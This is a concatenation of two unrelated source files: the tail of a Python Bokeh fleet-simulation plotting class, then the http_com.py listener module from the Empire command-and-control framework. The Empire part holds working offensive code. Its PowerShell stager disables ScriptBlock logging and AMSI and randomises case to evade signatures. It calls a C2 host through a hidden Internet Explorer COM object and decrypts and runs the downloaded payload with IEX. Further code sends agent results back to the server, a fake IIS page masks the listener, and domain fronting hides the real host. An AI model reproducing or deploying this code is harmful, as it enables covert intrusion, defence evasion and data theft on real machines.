for decision, count in self.decisions[step].items():
text += (
f"<td style='text-align:right'><b>{decision}:</b>"
"</td><td style='width:15px'>"
f"{count}"
"<td>"
)
text += "</tr> </table>"
return text
@gen.coroutine
@without_document_lock
def update_first(self, lines, level_centers, level_demand, level_fleet):
print("Drawing centers...")
column_elements = []
toggles = defaultdict(list)
i = -1
for level, centers in level_centers.items():
i += 1
# Level 0 corresponds to regular intersections
if level == 0:
self.create_regular_points(centers)
self.create_value_function_points(centers)
continue
# Line types = Direct lines or Shortest Path lines, from
# centers to elements.
# Lines xy = Dicitionary of line coordinates, for example,
# {x=[[x1, x2], [x1, x3]], y=[[y1, y2], [y1, y3]]}
for line_type, lines_xy in lines.items():
toggle = self.get_region_center_toggle(
lines_xy, i, level, level_demand, level_fleet, centers
)
toggles[line_type].append(toggle)
# Add all toggles to column
for line_type in lines:
# Title before region center toggles
line_type_title = Div(
text=f"<h3>{line_type} lines</h3>", width=150
)
column_elements.append(line_type_title)
# Toggles
column_elements.extend(toggles[line_type])
column_elements.append(self.slide_alpha)
column_elements.append(self.slide_time_ahead)
column_elements.append(self.slide_battery_level)
column_elements.append(self.slide_agg_level)
title = Div(
text=(f"<h1>{self.env.config.region}</h1>"), align="center"
)
network_info = Div(
text=(
f"<h2>{self.env.config.node_count} nodes & "
f"{self.env.config.edge_count} edges</h2>"
),
align="center",
)
center_count = Div(
text=(
" - ".join(
[
f"<b>{dist}</b>({count})"
for dist, count in self.env.config.center_count_dict.items()
]
)
)
)
self.doc.add_root(
column(
title,
network_info,
self.stats,
row(column(*column_elements), self.p),
center_count,
)
)
self.config_figure()
print("Centers, toggles, and slides created.")
def plot_centers(
self,
points,
levels,
level_demand,
level_fleet,
show_sp_lines=True,
show_lines=True,
path_center_data=None,
):
try:
print("\nReading center data...")
center_lines_dict = np.load(
self.path_region_center_data, allow_pickle=True
).item()
centers_xy = center_lines_dict["centers_xy"]
lines_xy = center_lines_dict["lines_xy"]
print("Center data loaded successfully.")
# Centers were not previously saved
except Exception as e:
print(
f"\nFailed reading center data. Exception: {e} "
"\nPulling center data from server..."
)
centers_xy, lines_xy = vi.get_center_elements(
points, levels, sp_lines=show_sp_lines, direct_lines=show_lines
)
print("Saving center data...")
np.save(
self.path_region_center_data,
{
"centers_xy": PlotTrack.default_to_regular(centers_xy),
"lines_xy": PlotTrack.default_to_regular(lines_xy),
},
)
print(f"Center data saved at '{self.path_region_center_data}'")
self.doc.add_next_tick_callback(
partial(
self.update_first,
lines=lines_xy,
level_centers=centers_xy,
level_fleet=level_fleet,
level_demand=level_demand,
)
)
print("Finished plotting centers.")
@gen.coroutine
def update_time_ahead(self, attrname, old, new):
steps_ahead = self.slide_time_ahead.value
battery_level = self.slide_battery_level.value
agg_level = self.slide_agg_level.value
print("Changing value function", steps_ahead, battery_level, agg_level)
self.update_value_function(steps_ahead, battery_level, agg_level)
def multithreading(self, func, args, workers):
with ThreadPoolExecutor(workers) as ex:
res = ex.map(func, args)
return list(res)
def compute_movements(self, step):
self.fleet_stats[step] = self.env.get_fleet_stats()
self.decisions[step] = self.env.decision_dict
fleet = self.env.cars
# If working with hired vehicles, only compute movements from those
# which started working, i.e., hired.
try:
active_hired = [
car for car in self.env.hired_cars if not car.started_contract
]
fleet += active_hired
except:
pass
# Get car paths
for car in fleet:
# if car.status == CarStatus.IDLE:
# continue
# Car path was stored in previous step since its route
# covers more than one time step
if car.id not in self.step_car_path_dict[step]:
# segmented_sp = nw.query_segmented_sp(
# c.previous,
# c.point,
# n_points,
# step_duration,
# projection="MERCATOR",
# waypoint=c.waypoint,
# )
if car.previous == car.point:
segmented_sp = [[[car.point.x, car.point.y]]]
# Vehicle is moving
else:
# TODO should be current time?
dif = (car.step - car.previous_step) * 5
# dif = dif * 10
segmented_sp = nw.query_sp_sliced(
car.previous,
car.point,
PlotTrack.N_POINTS * dif,
dif,
projection="MERCATOR",
waypoint=car.waypoint,
)
# if segmented_sp[0]:
# print(f'{c.id} - INSERT TW: ({c.previous_arrival},{c.arrival_time}) Segmented SP: {len(segmented_sp)}')
# print("S:", c.previous, c.point)
# Update car movement in step
for i, s in enumerate(segmented_sp):
if not s:
print(
f"NOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO TYPE: {car.type} - STATUS: {car.status} - dif:{dif} - arrival:{car.arrival_time}/previous:{car.previous_arrival}- Segmented: {segmented_sp}"
)
self.step_car_path_dict[step + i][car.id] = (car.status, s)
# else:
# print(
# # f"Segmented: {[len(s) for status, s in movement_step_fleet_dict[step]]}."
# f"\n################ {c} ##############################"
# f"\n- Status: {c.status} "
# f"\n- Previous arrival: {c.previous_arrival} "
# f"\n- Arrival: {c.arrival_time} "
# f"\n- Step: {c.step}/{step} "
# )
# def get_next_frame(self, step):
# if step in self.step_car_path_dict and self.step_car_path_dict[step]:
# xy_status = defaultdict(lambda: dict(x=[], y=[]))
# count_finished = 0
# for status, path_car in self.step_car_path_dict[step].values():
# if len(path_car) > 1:
# x, y = path_car.pop(0)
# xy_status[status]["x"].append(x)
# xy_status[status]["y"].append(y)
# # Does not erase last position visited by car
# # When number of coordinates vary, it is desirible that
# # cars that have already travelled their paths wait in
# # the last position they visited.
# elif len(path_car) == 1:
# x, y = path_car[0]
# count_finished += 1
# xy_status[status]["x"].append(x)
# xy_status[status]["y"].append(y)
# else:
# print(step)
# # pprint(self.step_car_path_dict)
# # pprint(self.step_car_path_dict[step])
# # pass
# # TODO Sometimes path_car[0] does no exist. This
# # cannot happen since coordinates are popped when
# # there are more than 2 elements.
# # Multithreading? path_car was not populated
# # correctly in the first place?
# if count_finished == len(self.step_car_path_dict[step].keys()):
# return xy_status, step + 1
# else:
# return xy_status, step
# ################################################################ #
# START ########################################################## #
# ################################################################ #
def start_animation(self, opt_method):
"""Start animation using opt_method as a base.
In opt_method, movements are computed and passed to simulator.
Parameters
----------
opt_method : callable
Function where the optimization takes place.
"""
thread = Thread(
target=partial(opt_method, plot_track=self, config=self.config)
)
thread.start()
self.doc.add_periodic_callback(
self.update_plot_frame, PlotTrack.FRAME_UPDATE_DELAY
)
|
http_com.py
|
import logging
import base64
import random
import os
import ssl
import time
import copy
import json
import sys
from pydispatch import dispatcher
from flask import Flask, request, make_response, send_from_directory
# Empire imports
from lib.common import helpers
from lib.common import agents
from lib.common import encryption
from lib.common import packets
from lib.common import messages
class Listener:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S] COM',
'Author': ['@harmj0y'],
'Description': ('Starts a http[s] listener (PowerShell only) that uses a GET/POST approach '
'using a hidden Internet Explorer COM object. If using HTTPS, valid certificate required.'),
'Category' : ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name' : {
'Description' : 'Name for the listener.',
'Required' : True,
'Value' : 'http_com'
},
'Host' : {
'Description' : 'Hostname/IP for staging.',
'Required' : True,
'Value' : "http://%s" % (helpers.lhost())
},
'BindIP' : {
'Description' : 'The IP to bind to on the control server.',
'Required' : True,
'Value' : '0.0.0.0'
},
'Port' : {
'Description' : 'Port for the listener.',
'Required' : True,
'Value' : ''
},
'Launcher' : {
'Description' : 'Launcher string.',
'Required' : True,
'Value' : 'powershell -noP -sta -w 1 -enc '
},
'StagingKey' : {
'Description' : 'Staging key for initial agent negotiation.',
'Required' : True,
'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay' : {
'Description' : 'Agent delay/reach back interval (in seconds).',
'Required' : True,
'Value' : 5
},
'DefaultJitter' : {
'Description' : 'Jitter in agent reachback interval (0.0-1.0).',
'Required' : True,
'Value' : 0.0
},
'DefaultLostLimit' : {
'Description' : 'Number of missed checkins before exiting',
'Required' : True,
'Value' : 60
},
'DefaultProfile' : {
'Description' : 'Default communication profile for the agent.',
'Required' : True,
'Value' : "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath' : {
'Description' : 'Certificate path for https listeners.',
'Required' : False,
'Value' : ''
},
'KillDate' : {
'Description' : 'Date for the listener to exit (MM/dd/yyyy).',
'Required' : False,
'Value' : ''
},
'WorkingHours' : {
'Description' : 'Hours for the agent to operate (09:00-17:00).',
'Required' : False,
'Value' : ''
},
'RequestHeader' : {
'Description' : 'Cannot use Cookie header, choose a different HTTP request header for comms.',
'Required' : True,
'Value' : 'CF-RAY'
},
'Headers' : {
'Description' : 'Headers for the control server.',
'Required' : True,
'Value' : 'Server:Microsoft-IIS/7.5'
},
'SlackToken' : {
'Description' : 'Your SlackBot API token to communicate with your Slack instance.',
'Required' : False,
'Value' : ''
},
'SlackChannel' : {
'Description' : 'The Slack channel or DM that notifications will be sent to.',
'Required' : False,
'Value' : '#general'
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
# random padding length appended to the default_response to evade signature-based scans
self.header_offset = random.randint(0,64)
def default_response(self):
"""
Returns an IIS 7.5 404 not found page.
"""
return '\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>404 - File or directory not found.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;}',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;}',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>404 - File or directory not found.</h2>',
' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>',
' ' * self.header_offset, # pad the body with a random amount of whitespace to evade signature-based detection
])
def index_page(self):
"""
Returns a default HTTP server page.
"""
return '\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />',
'<title>IIS7</title>',
'<style type="text/css">',
'<!--',
'body {',
' color:#000000;',
' background-color:#B3B3B3;',
' margin:0;',
'}',
'',
'#container {',
' margin-left:auto;',
' margin-right:auto;',
' text-align:center;',
' }',
'',
'a img {',
' border:none;',
'}',
'',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="container">',
'<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>',
'</div>',
'</body>',
'</html>',
])
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print helpers.color("[!] Option \"%s\" is required." % (key))
return False
# If we've selected an HTTPS listener without specifying CertPath, let us know.
if self.options['Host']['Value'].startswith('https') and self.options['CertPath']['Value'] == '':
print helpers.color("[!] HTTPS selected but no CertPath specified.")
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print helpers.color('[!] listeners/http_com generate_launcher(): no language specified!')
return None
if listenerName and (listenerName in self.threads) and (listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
requestHeader = listenerOptions['RequestHeader']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPF")+"=[ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(");If($"+helpers.generate_random_script_var_name("GPF")+"){$"+helpers.generate_random_script_var_name("GPC")+"=$"+helpers.generate_random_script_var_name("GPF")+".GetValue($null);If($"+helpers.generate_random_script_var_name("GPC")+"")
stager += "['ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("){$"+helpers.generate_random_script_var_name("GPC")+"")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPC")+"")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("val")+"=[Collections.Generic.Dictionary[string,System.Object]]::new();$"+helpers.generate_random_script_var_name("val")+".Add")
stager += "('EnableScriptB'+'lockLogging',0);"
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("val")+".Add")
stager += "('EnableScriptBlockInvocationLogging',0);"
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPC")+"")
stager += "['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("=$"+helpers.generate_random_script_var_name("val")+"}")
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
stager += "'signatures','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
# @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization("$Ref=[Ref].Assembly.GetType(")
stager += "'System.Management.Automation.Ams'+'iUtils'"
stager += helpers.randomize_capitalization(');$Ref.GetField(')
stager += "'am'+'siInitFailed','NonPu'+'blic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,$true);")
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
# TODO: reimplement stager retries?
#check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("K")+"=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
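# $R implements RC4: it builds the 256-byte S-box from the key (KSA) and
# XORs the data with the generated keystream (PRGA).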
stager += helpers.randomize_capitalization('$R={$D,$'+helpers.generate_random_script_var_name("K")+'=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$'+helpers.generate_random_script_var_name("K")+'[$_%$'+helpers.generate_random_script_var_name("K")+'.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
stager += "$ie=New-Object -COM InternetExplorer.Application;$ie.Silent=$True;$ie.visible=$False;$fl=14;"
stager += "$ser="+helpers.obfuscate_call_home_address(host)+";$t='"+stage0+"';"
# add the RC4 packet to a header location
stager += "$c=\"%s: %s" % (requestHeader, b64RoutingPacket)
#Add custom headers if any
modifyHost = False
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
if headerKey.lower() == "host":
modifyHost = True
stager += "`r`n%s: %s" % (headerKey, headerValue)
stager += "\";"
#If host header defined, assume domain fronting is in use and add a call to the base URL first
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if modifyHost:
stager += helpers.randomize_capitalization("$ie.navigate2($ser,$fl,0,$Null,$Null);while($ie.busy){Start-Sleep -Milliseconds 100};")
stager += "$ie.navigate2($ser+$t,$fl,0,$Null,$c);"
stager += "while($ie.busy){Start-Sleep -Milliseconds 100};"
stager += "$ht = $ie.document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetProperty, $Null, $ie.document, $Null).InnerHtml;"
stager += "try {$data=[System.Convert]::FromBase64String($ht)} catch {$Null}"
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$"+helpers.generate_random_script_var_name("K")+")) | IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
else:
print helpers.color("[!] listeners/http_com generate_launcher(): invalid language specification: only 'powershell' is currently supported for this module.")
else:
print helpers.color("[!] listeners/http_com generate_launcher(): invalid listener name specification!")
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print helpers.color('[!] listeners/http_com generate_stager(): no language specified!')
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
stagingKey = listenerOptions['StagingKey']['Value']
host = listenerOptions['Host']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http_com.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
#Patch in custom Headers
headers = ""
if customHeaders != []:
crlf = False
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# Host header TLS SNI logic done within http_com.ps1
if crlf:
headers += "`r`n"
else:
crlf = True
headers += "%s: %s" % (headerKey, headerValue)
stager = stager.replace("$customHeaders = \"\";","$customHeaders = \""+headers+"\";")
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
#patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
randomizedStager = ''
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey, randomizedStager)
else:
# otherwise just return the case-randomized stager
return randomizedStager
else:
print helpers.color("[!] listeners/http_com generate_stager(): invalid language specification, only 'powershell' is current supported for this module.")
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print helpers.color('[!] listeners/http_com generate_agent(): no language specified!')
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
b64DefaultResponse = base64.b64encode(self.default_response())
if language == 'powershell':
f = open(self.mainMenu.installPath + "./data/agent/agent.ps1")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+b64DefaultResponse+'"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
else:
print helpers.color("[!] listeners/http_com generate_agent(): invalid language specification, only 'powershell' is currently supported for this module.")
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
if(-not $IE) {
$Script:IE=New-Object -COM InternetExplorer.Application;
$Script:IE.Silent = $True
$Script:IE.visible = $False
}
else {
$Script:IE = $IE
}
""" % (listenerOptions['Host']['Value'])
getTask = """
$script:GetTask = {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
$Headers = "%s: $RoutingCookie"
$script:Headers.GetEnumerator()| %%{ $Headers += "`r`n$($_.Name): $($_.Value)" }
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$ServerURI = $Script:ControlServers[$Script:ServerIndex] + $taskURI
$Script:IE.navigate2($ServerURI, 14, 0, $Null, $Headers)
while($Script:IE.busy -eq $true){Start-Sleep -Milliseconds 100}
$html = $Script:IE.document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetProperty, $Null, $Script:IE.document, $Null).InnerHtml
try {
[System.Convert]::FromBase64String($html)
}
catch {$Null}
}
}
catch {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
""" % (listenerOptions['RequestHeader']['Value'])
sendMessage = """
$script:SendMessage = {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
$bytes=$e.GetBytes([System.Convert]::ToBase64String($RoutingPacket));
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
$Headers = ""
$script:Headers.GetEnumerator()| %{ $Headers += "`r`n$($_.Name): $($_.Value)" }
$Headers.TrimStart("`r`n")
try {
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$ServerURI = $Script:ControlServers[$Script:ServerIndex] + $taskURI
$Script:IE.navigate2($ServerURI, 14, 0, $bytes, $Headers)
while($Script:IE.busy -eq $true){Start-Sleep -Milliseconds 100}
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
}
"""
return updateServers + getTask + sendMessage
else:
print helpers.color("[!] listeners/http_com generate_comms(): invalid language specification, only 'powershell' is currently supported for this module.")
else:
print helpers.color('[!] listeners/http_com generate_comms(): no language specified!')
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
app = Flask(__name__)
self.app = app
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
listenerName = self.options['Name']['Value']
message = "[!] {} on the blacklist/not on the whitelist requested resource".format(request.remote_addr)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.after_request
def change_header(response):
"Modify the headers response server."
headers = listenerOptions['Headers']['Value']
for key in headers.split("|"):
value = key.split(":")
response.headers[value[0]] = value[1]
return response
@app.after_request
def add_proxy_headers(response):
"Add HTTP headers to avoid proxy caching."
response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate"
response.headers['Pragma'] = "no-cache"
response.headers['Expires'] = "0"
return response
@app.route('/')
@app.route('/index.html')
def serve_index():
"""
Return default server web page if user navigates to index.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return make_response(self.index_page(), 200)
@app.route('/welcome.png')
def serve_index_helper():
"""
Serves image loaded by index page.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return send_from_directory(static_dir, 'welcome.png')
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
clientIP = request.remote_addr
listenerName = self.options['Name']['Value']
message = "[*] GET request for {}/{} from {}".format(request.host, request_uri, clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
routingPacket = None
reqHeader = request.headers.get(listenerOptions['RequestHeader']['Value'])
if reqHeader and reqHeader != '':
try:
# decode the routing packet base64 value from the custom HTTP request header location
routingPacket = base64.b64decode(reqHeader)
except Exception as e:
routingPacket = None
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if results == 'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
listenerName = self.options['Name']['Value']
message = "[*] Sending {} stager (stage 1) to {}".format(language, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
stage = self.generate_stager(language=language, listenerOptions=listenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(base64.b64encode(stage), 200)
elif results.startswith('ERROR:'):
listenerName = self.options['Name']['Value']
message = "[!] Error from agents.handle_agent_data() for {} from {}: {}".format(request_uri, clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
if 'not in cache' in results:
# signal the client to restage
print helpers.color("[*] Orphaned agent from %s, signaling retaging" % (clientIP))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 404)
else:
# actual taskings
listenerName = self.options['Name']['Value']
message = "[*] Agent from {} retrieved taskings".format(clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(base64.b64encode(results), 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http_com')
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
else:
listenerName = self.options['Name']['Value']
message = "[!] {} requested by {} with no routing packet.".format(request_uri, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
try:
requestData = base64.b64decode(request.get_data())
except:
requestData = None
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if results.startswith('STAGE2'):
# TODO: document the exact results structure returned
